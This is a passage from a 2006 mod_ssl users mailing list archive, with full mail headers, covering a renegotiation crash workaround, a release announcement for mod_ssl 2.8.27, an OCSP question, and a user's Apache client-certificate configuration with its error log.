> safe for mod_ssl 2.8 too AFAIK.

I'll try the patch and report back if it still causes error after a =20
while, thank for the feedback.

Love



--Apple-Mail-9--781309501
content-type: application/pgp-signature; x-mac-type=70674453;
	name=PGP.sig
content-description: This is a digitally signed message part
content-disposition: inline; filename=PGP.sig
content-transfer-encoding: 7bit

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (Darwin)

iD8DBQFEYIiMJyok7cfdyBYRAuFEAKCueoBZa2ZemJFPVsKsarKSEjdJigCfduY2
RcEu9p1GcY9zzCRxoJm4zxg=
=SpKN
-----END PGP SIGNATURE-----

--Apple-Mail-9--781309501--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  9 16:11:10 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id F219514D8A5; Tue,  9 May 2006 16:11:09 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mower.iserver.net (allez-oop.net [128.121.79.16])
	by master.modssl.org (Postfix) with ESMTP id 5070714D839
	for ; Tue,  9 May 2006 16:11:08 +0200 (CEST)
Received: from [10.20.12.65] (fw.oremut02.us.wh.verio.net [198.65.168.24])
	(authenticated bits=0)
	by mower.iserver.net (8.13.6/8.13.1) with ESMTP id k49EB2UB083587
	for ; Tue, 9 May 2006 08:11:03 -0600 (MDT)
Message-ID: <4460A321.9090805@allez-oop.net>
Date: Tue, 09 May 2006 08:11:45 -0600
From: "Omar W. Hannet" 
User-Agent: Thunderbird 1.5 (X11/20060421)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Experimental per-directory CRL
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Omar W. Hannet" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I just noticed the SSL_EXPERIMENTAL_PERDIRCRL code was gone from mod_ssl
since a couple of versions ago.  Any chance of it ever coming back?

-- 
Omar W. Hannet
Allez-Oop Net
http://www.allez-oop.net/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 10 10:13:50 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D9D0A14D8A9; Wed, 10 May 2006 10:13:49 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from elephant.cnchost.com (elephant.cnchost.com [207.155.252.97])
	by master.modssl.org (Postfix) with ESMTP id 6218E14D88F
	for ; Wed, 10 May 2006 10:13:48 +0200 (CEST)
Received: from [192.168.0.21] (c-24-15-193-17.hsd1.il.comcast.net [24.15.193.17])
	by elephant.cnchost.com (ConcentricHost(2.54) Relay) with ESMTP id 850214D08;
	Wed, 10 May 2006 04:13:42 -0400 (EDT)
Message-ID: <4461A0B5.7070701@rowe-clan.net>
Date: Wed, 10 May 2006 03:13:41 -0500
From: "William A. Rowe, Jr." 
User-Agent: Mozilla Thunderbird 1.0.7-1.1.fc4 (X11/20050929)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To:  modssl-users@modssl.org
CC: "Ralf S. Engelschall" 
Subject: Re: ssl_callback_SSLVerify re-negotiation handshake crash
References: <61E88A81-42B9-48D7-B2A3-5DE79E71E9CA@it.su.se> <20060508065842.GB34962@engelschall.com> <20060508080926.GA9284@redhat.com>
In-Reply-To: <20060508080926.GA9284@redhat.com>
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "William A. Rowe, Jr." 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Joe Orton wrote:
> On Mon, May 08, 2006 at 08:58:42AM +0200, Ralf S. Engelschall wrote:
> 
>>On Tue, Apr 04, 2006, Love Hörnquist Åstrand wrote:
>>
>>>(gdb) bt
>>>#0  CRYPTO_get_ex_data (ad=0xe8, idx=137019688) at ex_data.c:628
>>>#1  0x4035c035 in SSL_get_ex_data (s=0x1, idx=296) at ssl_lib.c:2220
> 
> Looks like http://issues.apache.org/bugzilla/show_bug.cgi?id=32529 - see 
> analysis from comment 11 onwards.  This "shouldn't happen", but the 
> workaround http://svn.apache.org/viewcvs?view=rev&rev=111241 should be 
> safe for mod_ssl 2.8 too AFAIK.

Thaat would be cool - FWIW 1.3.35 was effectively scuttled by the new barf
of Include /conf/* amoung some other conf file processing quirks with a patch
that's now reverted...

JimJag plans to T&R 1.3.36 Friday, so release might come Monday.  I thought
a heads-up would be a nice courtesy, and I'm happy to answer more questions
about the other patch I proposed, as well.  Would be nice to see these both,
since I've had no reports, no regressions from that scoping patch.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 17 21:13:28 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6E44D14D8A7; Wed, 17 May 2006 21:13:28 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp1.engelschall.com (visp1.engelschall.com [195.30.6.144])
	by master.modssl.org (Postfix) with ESMTP id 7ABFF14D839;
	Wed, 17 May 2006 21:13:27 +0200 (CEST)
Received: by visp1.engelschall.com (Postfix, from userid 21100)
	id DBACF1B4486B; Wed, 17 May 2006 21:13:26 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 01CE6A17C3; Wed, 17 May 2006 21:13:07 +0200 (CEST)
Date: Wed, 17 May 2006 21:13:07 +0200
From: "Ralf S. Engelschall" 
To: modssl-announce@modssl.org, modssl-users@modssl.org
Subject: [ANNOUNCE] mod_ssl 2.8.27 for Apache 1.3.36
Message-ID: <20060517191307.GA31134@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Organization: Engelschall, Germany.
User-Agent: Mutt/1.5.11 OpenPKG/CURRENT
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Today Apache 1.3.36 was released.
An updated mod_ssl 2.8.27 for Apache 1.3.36 is now available, too.

                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 17 21:29:48 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0A89A14D8A3; Wed, 17 May 2006 21:29:48 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mtawhl1.disanet.disa-u.mil (mtawhl1.pac.disa.mil [198.22.28.3])
	by master.modssl.org (Postfix) with ESMTP id 7DC0014D839
	for ; Wed, 17 May 2006 21:29:42 +0200 (CEST)
Received: by mtawhl1.pac.disa.mil with Internet Mail Service (5.5.2657.72)
	id ; Wed, 17 May 2006 09:29:31 -1000
Message-ID: <8B3BECEEF7677D4F96CC9C9E2AB9DE7D02B7DEA3@emswhl1.pac.disa.mil>
From: "Victor, Dwight P CTR DISA PAC" 
To: "'modssl-users@modssl.org'" 
Subject: OCSP? (UNCLASSIFIED)
Date: Wed, 17 May 2006 09:29:29 -1000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2657.72)
MIME-Version: 1.0
Content-Type: multipart/signed;
	protocol="application/x-pkcs7-signature";
	boundary="----=_NextPart_000_008B_01C67994.63DDF890";
	micalg=SHA1
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1807
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Victor, Dwight P CTR DISA PAC" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_008B_01C67994.63DDF890
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Classification:  UNCLASSIFIED 
Caveats: NONE


Hello List!

Has anyone had any experience/success with using mod_ssl + Apache v2 to
query an OCSP responder regarding the status of an end-user provided
certificate and allow/deny access based on the response?  Any tips,
suggestions, discussion would be appreciated.

Best Regards,

Dwight...

---
Dwight Victor, CISSP (Contractor)
Systems Administrator / Webmaster
General Dynamics C4 Systems
EMAIL: dwight.victor.ctr@disa.mil
TEL:   (808) 653-3677 ext 229

Classification:  UNCLASSIFIED 
Caveats: NONE


------=_NextPart_000_008B_01C67994.63DDF890
Content-Type: application/x-pkcs7-signature;
	name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="smime.p7s"

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIM9TCCBBww
ggOFoAMCAQICASgwDQYJKoZIhvcNAQEFBQAwYTELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1UuUy4g
R292ZXJubWVudDEMMAoGA1UECxMDRG9EMQwwCgYDVQQLEwNQS0kxHDAaBgNVBAMTE0RvRCBDTEFT
UyAzIFJvb3QgQ0EwHhcNMDMwNjEwMDk1NTAxWhcNMDkwNjA4MDk1NTAxWjBlMQswCQYDVQQGEwJV
UzEYMBYGA1UEChMPVS5TLiBHb3Zlcm5tZW50MQwwCgYDVQQLEwNEb0QxDDAKBgNVBAsTA1BLSTEg
MB4GA1UEAxMXRE9EIENMQVNTIDMgRU1BSUwgQ0EtMTAwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJ
AoGBANQhe2pVqqwwtYkLXpPlJBxR3fip5SMYdRFf25JmURt8Zb1+KhM6CCOWxBmPJg3ER/L5rPtS
RFuuco6M+lSHDfKnRKepJFBUfSieHPeBCtvh35PSvjDKXEQMf5G+fmMcYL/HbHbDPrKxUHx5Sprk
xqQKolLXpLcvbqlDu8565vBpAgMBAAGjggHeMIIB2jAdBgNVHQ4EFgQUbzcjpNMg6/QMP2CfeUwL
chDSPJcwDgYDVR0PAQH/BAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wDAYDVR0kBAUwA4ABADAfBgNV
HSMEGDAWgBRsnKXwXI9tQY3EFzuQV8IPo81t/jAwBgNVHSAEKTAnMAsGCWCGSAFlAgELBTALBglg
hkgBZQIBCwkwCwYJYIZIAWUCAQsKMIGDBgNVHRIEfDB6hnhsZGFwOi8vZHMtMy5jM3BraS5jaGFt
Yi5kaXNhLm1pbC9jbiUzZERvRCUyMENMQVNTJTIwMyUyMFJvb3QlMjBDQSUyY291JTNkUEtJJTJj
b3UlM2REb0QlMmNvJTNkVS5TLiUyMEdvdmVybm1lbnQlMmNjJTNkVVMwgbAGA1UdHwSBqDCBpTCB
oqCBn6CBnIaBmWxkYXA6Ly9kcy0zLmMzcGtpLmNoYW1iLmRpc2EubWlsL2NuJTNkRG9EJTIwQ0xB
U1MlMjAzJTIwUm9vdCUyMENBJTJjb3UlM2RQS0klMmNvdSUzZERvRCUyY28lM2RVLlMuJTIwR292
ZXJubWVudCUyY2MlM2RVUz9jZXJ0aWZpY2F0ZXJldm9jYXRpb25saXN0O2JpbmFyeTANBgkqhkiG
9w0BAQUFAAOBgQCnZVmnmbJyuKSZpTUKwp7gCLe3akj225PQOrhHx0gt64LH2fvDEwhCriHO8jRG
IyDdRCQiDpPe9u2Y/xK/wvIUWDUBPML/m+OwGODiuTF81N8egB7OtG+iq2sa2oU+97oi1rYIFj4d
jZnvWz49FG9q5FTodfD1Yphd3hfJ6Y+DCTCCBEEwggOqoAMCAQICAx/mxDANBgkqhkiG9w0BAQUF
ADBlMQswCQYDVQQGEwJVUzEYMBYGA1UEChMPVS5TLiBHb3Zlcm5tZW50MQwwCgYDVQQLEwNEb0Qx
DDAKBgNVBAsTA1BLSTEgMB4GA1UEAxMXRE9EIENMQVNTIDMgRU1BSUwgQ0EtMTAwHhcNMDUxMDEx
MDAwMDAwWhcNMDgxMDAzMjM1OTU5WjCBgjELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1UuUy4gR292
ZXJubWVudDEMMAoGA1UECxMDRG9EMQwwCgYDVQQLEwNQS0kxEzARBgNVBAsTCkNPTlRSQUNUT1Ix
KDAmBgNVBAMTH1ZJQ1RPUi5EV0lHSFQuUEhJTElQLjEyNjg3NzMxMDYwgZ8wDQYJKoZIhvcNAQEB
BQADgY0AMIGJAoGBAK+HFyjqsB3OI0A8uLG3w9mg0cgzxa94OPJGtVK9SoFxMlwnSHcxmobboTnC
NHKOXmkN6MT8bPp8Omeppf0zHTzSzcacwv/EkPz4Zk20IDwceo2RevXy01u7U3777ZtW1EzLrjAL
6mY6oD2KXZG45OpJDjg4oNGbpo2k2WPTIP3bAgMBAAGjggHfMIIB2zAOBgNVHQ8BAf8EBAMCBSAw
JQYDVR0RBB4wHIEaZHdpZ2h0LnZpY3Rvci5jdHJAZGlzYS5taWwwHwYDVR0jBBgwFoAUbzcjpNMg
6/QMP2CfeUwLchDSPJcwHQYDVR0OBBYEFJGhNIbyEnLXIMahd22+LZAQg6FOMBYGA1UdIAQPMA0w
CwYJYIZIAWUCAQsJMIGOBgNVHRIEgYYwgYOGgYBsZGFwOi8vZW1haWwtZHMtNC5jM3BraS5kZW4u
ZGlzYS5taWwvY24lM2RET0QlMjBDTEFTUyUyMDMlMjBFTUFJTCUyMENBLTEwJTJjb3UlM2RQS0kl
MmNvdSUzZERvRCUyY28lM2RVLlMuJTIwR292ZXJubWVudCUyY2MlM2RVUzCBuAYDVR0fBIGwMIGt
MIGqoIGnoIGkhoGhbGRhcDovL2VtYWlsLWRzLTQuYzNwa2kuZGVuLmRpc2EubWlsL2NuJTNkRE9E
JTIwQ0xBU1MlMjAzJTIwRU1BSUwlMjBDQS0xMCUyY291JTNkUEtJJTJjb3UlM2REb0QlMmNvJTNk
VS5TLiUyMEdvdmVybm1lbnQlMmNjJTNkVVM/Y2VydGlmaWNhdGVyZXZvY2F0aW9ubGlzdDtiaW5h
cnkwDQYJKoZIhvcNAQEFBQADgYEARRvrfgpwfPSmQh57wvP0UdjhVXud5CkqhR9jechpSuv6zI81
K5RazYSm3BZSGdKr7gbcpyYobSDRgYdI16VUqCnEHuuAB8+BqGmAvQ/5cj+XNnjdko41ZCWsPVPD
Z1h1FDH9xiVOSX5fbLJFIobWiLbcxdGtofPOGxSpA/oKNF0wggSMMIID9aADAgECAgMf5sMwDQYJ
KoZIhvcNAQEFBQAwZTELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1UuUy4gR292ZXJubWVudDEMMAoG
A1UECxMDRG9EMQwwCgYDVQQLEwNQS0kxIDAeBgNVBAMTF0RPRCBDTEFTUyAzIEVNQUlMIENBLTEw
MB4XDTA1MTAxMTAwMDAwMFoXDTA4MTAwMzIzNTk1OVowgYIxCzAJBgNVBAYTAlVTMRgwFgYDVQQK
Ew9VLlMuIEdvdmVybm1lbnQxDDAKBgNVBAsTA0RvRDEMMAoGA1UECxMDUEtJMRMwEQYDVQQLEwpD
T05UUkFDVE9SMSgwJgYDVQQDEx9WSUNUT1IuRFdJR0hULlBISUxJUC4xMjY4NzczMTA2MIGfMA0G
CSqGSIb3DQEBAQUAA4GNADCBiQKBgQCwQAYdZSGFQHDUfLHddrhI5Btde8C6yjy2r6L6y45jJapZ
ZRYmScwqWlft0bWrRzsTGef5ay82fdymDiZUfMDoKOB/tQ1QoBUxxdxRSk96ptEMUrZaQeXvtoNq
l6r8qafv7P1ncRqgiQxLyfZGEq1jktYN1UywdFauw+8Mut1cmwIDAQABo4ICKjCCAiYwDgYDVR0P
AQH/BAQDAgbAMB8GA1UdIwQYMBaAFG83I6TTIOv0DD9gn3lMC3IQ0jyXMB0GA1UdDgQWBBQWTNCc
1DPiYzUSfJSzxed0TEL8ejAWBgNVHSAEDzANMAsGCWCGSAFlAgELCTCBjgYDVR0SBIGGMIGDhoGA
bGRhcDovL2VtYWlsLWRzLTQuYzNwa2kuZGVuLmRpc2EubWlsL2NuJTNkRE9EJTIwQ0xBU1MlMjAz
JTIwRU1BSUwlMjBDQS0xMCUyY291JTNkUEtJJTJjb3UlM2REb0QlMmNvJTNkVS5TLiUyMEdvdmVy
bm1lbnQlMmNjJTNkVVMwgbgGA1UdHwSBsDCBrTCBqqCBp6CBpIaBoWxkYXA6Ly9lbWFpbC1kcy00
LmMzcGtpLmRlbi5kaXNhLm1pbC9jbiUzZERPRCUyMENMQVNTJTIwMyUyMEVNQUlMJTIwQ0EtMTAl
MmNvdSUzZFBLSSUyY291JTNkRG9EJTJjbyUzZFUuUy4lMjBHb3Zlcm5tZW50JTJjYyUzZFVTP2Nl
cnRpZmljYXRlcmV2b2NhdGlvbmxpc3Q7YmluYXJ5MCkGA1UdJQQiMCAGCisGAQQBgjcUAgIGCCsG
AQUFBwMEBggrBgEFBQcDAjBFBgNVHREEPjA8gRpkd2lnaHQudmljdG9yLmN0ckBkaXNhLm1pbKAe
BgorBgEEAYI3FAIDoBAMDjEyNjg3NzMxMDZAbWlsMA0GCSqGSIb3DQEBBQUAA4GBAM62LQD0KPob
Ke1x+jf/4xH6Mv/63GT6pGw2S1St2bmq5GDDgoMziieBEkqVVczDjg7+2DE/AyH8XF5Jy8EDsrMP
Z0gp3aqBG7Kl3NI8Szp1OgN8M3NJ7UZQi1n4kXSY8nPH4NhJvN1XqRPPGMUH94jRLjUUd2jgCtbh
+knezK8iMYICyTCCAsUCAQEwbDBlMQswCQYDVQQGEwJVUzEYMBYGA1UEChMPVS5TLiBHb3Zlcm5t
ZW50MQwwCgYDVQQLEwNEb0QxDDAKBgNVBAsTA1BLSTEgMB4GA1UEAxMXRE9EIENMQVNTIDMgRU1B
SUwgQ0EtMTACAx/mwzAJBgUrDgMCGgUAoIIBszAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwG
CSqGSIb3DQEJBTEPFw0wNjA1MTcxOTI5MjZaMCMGCSqGSIb3DQEJBDEWBBSZSSMEJI4eb3oikDds
+SFHolkRPDBYBgkqhkiG9w0BCQ8xSzBJMAoGCCqGSIb3DQMHMA4GCCqGSIb3DQMCAgIAgDAHBgUr
DgMCBzANBggqhkiG9w0DAgIBKDAHBgUrDgMCGjAKBggqhkiG9w0CBTB7BgkrBgEEAYI3EAQxbjBs
MGUxCzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9VLlMuIEdvdmVybm1lbnQxDDAKBgNVBAsTA0RvRDEM
MAoGA1UECxMDUEtJMSAwHgYDVQQDExdET0QgQ0xBU1MgMyBFTUFJTCBDQS0xMAIDH+bEMH0GCyqG
SIb3DQEJEAILMW6gbDBlMQswCQYDVQQGEwJVUzEYMBYGA1UEChMPVS5TLiBHb3Zlcm5tZW50MQww
CgYDVQQLEwNEb0QxDDAKBgNVBAsTA1BLSTEgMB4GA1UEAxMXRE9EIENMQVNTIDMgRU1BSUwgQ0Et
MTACAx/mxDANBgkqhkiG9w0BAQEFAASBgKgnMyQYLRGa5NftPxG+XAd/5nnXVLz6W0150T3+UYIJ
4/iYS47EebhbG07EXuCf7DwwJNIDunMpsBdKyqtL5m1qFvfdHqO6KbR4/lqB+e9AIni9KEeDqWAl
i9MiYeW0oKGoKO7xy9op6hRWgnWFJw7prk3tqGBBa2pSt/poACuxAAAAAAAA

------=_NextPart_000_008B_01C67994.63DDF890--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 17 22:05:33 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E78F614D8A8; Wed, 17 May 2006 22:05:33 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wellington.cnchost.com (wellington.concentric.net [207.155.252.14])
	by master.modssl.org (Postfix) with ESMTP id 6F44814D839;
	Wed, 17 May 2006 22:05:31 +0200 (CEST)
Received: from [192.168.0.21] (c-24-15-193-17.hsd1.il.comcast.net [24.15.193.17])
	by wellington.cnchost.com (ConcentricHost(2.54) Relay) with ESMTP id 50F04813C8;
	Wed, 17 May 2006 16:05:19 -0400 (EDT)
Message-ID: <446B81FD.9000909@rowe-clan.net>
Date: Wed, 17 May 2006 15:05:17 -0500
From: "William A. Rowe, Jr." 
User-Agent: Mozilla Thunderbird 1.0.8-1.1.fc4 (X11/20060501)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To:  modssl-users@modssl.org
CC:  modssl-announce@modssl.org
Subject: Re: [ANNOUNCE] mod_ssl 2.8.27 for Apache 1.3.36
References: <20060517191307.GA31134@engelschall.com>
In-Reply-To: <20060517191307.GA31134@engelschall.com>
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "William A. Rowe, Jr." 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

FYI - if you are asking, there's no announce yet since 1.3.36 simply fixes
the "Include" directive regressions introduced in 1.3.35, if you either nested
your Include directive in a   block, or you used the
wildcard match for your Include directive.  It will be some time before all
the mirrors have caught up.

The announce of 1.3.36 is here;

http://www.apache.org/dist/httpd/Announcement1.3.txt

Many thanks to Ralf for providing mod_ssl's corresponding patch so quickly.

Ralf S. Engelschall wrote:
> Today Apache 1.3.36 was released.
> An updated mod_ssl 2.8.27 for Apache 1.3.36 is now available, too.
> 
>                                        Ralf S. Engelschall
>                                        rse@engelschall.com
>                                        www.engelschall.com
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> .
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 22 15:38:03 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7705314D85A; Mon, 22 May 2006 15:38:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wx-out-0102.google.com (wx-out-0102.google.com [66.249.82.203])
	by master.modssl.org (Postfix) with ESMTP id C94E714D82B
	for ; Mon, 22 May 2006 15:38:02 +0200 (CEST)
Received: by wx-out-0102.google.com with SMTP id s19so267764wxc
        for ; Mon, 22 May 2006 06:37:54 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=trEIaxqvW5awNEH8CH58OXIgvxE3YXSS1+vCUFjpGPLDb2oY0FNVzCSg974MI1W3PbnEcRFj+2ornwF8v0ErLlCZotAXvb14V3G1Kfvb0iXWDG3BQ4SHjBp5GBl8vXZcM+O4bbH80a5a0ilQHuPYvTO5DkuiTaAOBpIt7tqyWnw=
Received: by 10.70.65.14 with SMTP id n14mr5173059wxa;
        Mon, 22 May 2006 06:37:53 -0700 (PDT)
Received: by 10.70.32.11 with HTTP; Mon, 22 May 2006 06:37:53 -0700 (PDT)
Message-ID: 
Date: Mon, 22 May 2006 15:37:53 +0200
From: "=?ISO-8859-1?Q?Fran=E7ois_Soumillion?=" 
To: modssl-users@modssl.org
Subject: SSL_CLIENT_XXX is null
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "=?ISO-8859-1?Q?Fran=E7ois_Soumillion?=" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,

First of all, thanks for the very good job with openssl.  It really rocks !=
!

Now my question:
I'm trying to setup strong authentication via client certificate (belgian e=
id).
You can see my apache config

NameVirtualHost *

=09ServerAdmin webmaster@localhost
=09
=09DocumentRoot /var/www/

    SSLEngine on
    SSLCertificateFile /etc/apache2/ssl/apache.pem
    SSLCertificateKeyFile /etc/apache2/ssl/apache.pem
    SSLVerifyClient optional_no_ca
    SSLVerifyDepth 5
    SSLCACertificateFile /etc/apache2/ssl/BelgiumRootCA.pem
    SSLOptions +FakeBasicAuth +ExportCertData +StdEnvVars +CompatEnvVars
#    SSLUserName SSL_CLIENT_S_DN_CN
    RequestHeader set SSL_CLIENT_DN %{SSL_CLIENT_DN}e
    RequestHeader set SSL_CLIENT_S_DN %{SSL_CLIENT_S_DN}e
    RequestHeader set SSL_CLIENT_S_DN_CN %{SSL_CLIENT_S_DN_CN}e
    RequestHeader set SSL_CLIENT_S_DN_S %{SSL_CLIENT_S_DN_S}e
    RequestHeader set SSL_SERVER_S_DN %{SSL_SERVER_S_DN}e
    RequestHeader set SSL_PROTOCOL %{SSL_PROTOCOL}e
    RequestHeader set MyHeader "coucou"

=09
=09=09Options FollowSymLinks
=09=09AllowOverride None
=09
=09
=09=09Options Indexes FollowSymLinks MultiViews
=09=09AllowOverride None
=09=09Order allow,deny
=09=09allow from all
=09=09# This directive allows us to have apache2's default start page
                # in /apache2-default/, but still have / go to the right pl=
ace
                # Commented out for Ubuntu
                #RedirectMatch ^/$ /apache2-default/
=09

=09ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
=09
=09=09AllowOverride None
=09=09Options ExecCGI -MultiViews +SymLinksIfOwnerMatch
=09=09Order allow,deny
=09=09Allow from all
=09

=09ErrorLog /var/log/apache2/error.log

=09# Possible values include: debug, info, notice, warn, error, crit,
=09# alert, emerg.
=09LogLevel info

=09CustomLog /var/log/apache2/access.log combined
=09ServerSignature On

    Alias /doc/ "/usr/share/doc/"
    
        Options Indexes MultiViews FollowSymLinks
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.0/255.0.0.0 ::1/128
    


I've a small PHP script that dumps all the HTTP headers.  All the HTTP
headers about the cient (SSL_CLIENT_XXX) contain (null) while
SSL_SERVER_S_DN and SSL_PROTOCOL are successfully populated.
What's wrong with what I've done.
I use my belgian eid on other website so the root cause is not at the
client side.  I also include my error.log that can maybe help you.  It
looks ok expect for the timeout but I don't know if I have to care
about it.

[Mon May 22 15:23:12 2006] [notice] Apache/2.0.54 (Ubuntu)
PHP/5.0.5-2ubuntu1.2 mod_ssl/2.0.54 OpenSSL/0.9.7g configured --
resuming normal operations
[Mon May 22 15:23:20 2006] [info] Connection to child 0 established
(server localhost.localdomain:443, client 127.0.0.1)
[Mon May 22 15:23:20 2006] [info] Seeding PRNG with 136 bytes of entropy
[Mon May 22 15:23:20 2006] [info] Initial (No.1) HTTPS request
received for child 0 (server localhost.localdomain:443)
[Mon May 22 15:23:27 2006] [info] Connection to child 0 closed with
standard shutdown(server localhost.localdomain:443, client 127.0.0.1)
[Mon May 22 15:23:27 2006] [info] Connection to child 1 established
(server localhost.localdomain:443, client 127.0.0.1)
[Mon May 22 15:23:27 2006] [info] Seeding PRNG with 136 bytes of entropy
[Mon May 22 15:23:27 2006] [info] Initial (No.1) HTTPS request
received for child 1 (server localhost.localdomain:443)
[Mon May 22 15:23:27 2006] [info] Subsequent (No.2) HTTPS request
received for child 1 (server localhost.localdomain:443)
[Mon May 22 15:23:42 2006] [info] (70007)The timeout specified has
expired: SSL input filter read failed.
[Mon May 22 15:23:42 2006] [info] Connection to child 1 closed with
standard shutdown(server localhost.localdomain:443, client 127.0.0.1)

Thanks in advance for your help

Fran=E7ois
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 22 16:02:19 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2BFC414D85A; Mon, 22 May 2006 16:02:19 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from frfcqmg011ix3r8.montpellier.mebs.ihost.com (frfcqmg011ix3r8.montpellier.mebs.ihost.com [129.35.163.230])
	by master.modssl.org (Postfix) with ESMTP id A87B814D82B
	for ; Mon, 22 May 2006 16:02:18 +0200 (CEST)
Received: from frfcqws071ix328.infra.montpellier.mebs.ihost.com ([10.0.77.8])
	by frfcqmg011ix3r8.montpellier.mebs.ihost.com (8.12.11/8.12.11) with ESMTP id k4ME1pP5028813
	for ; Mon, 22 May 2006 16:01:51 +0200
Subject: Jean-Pierre Guilloteau est absent.
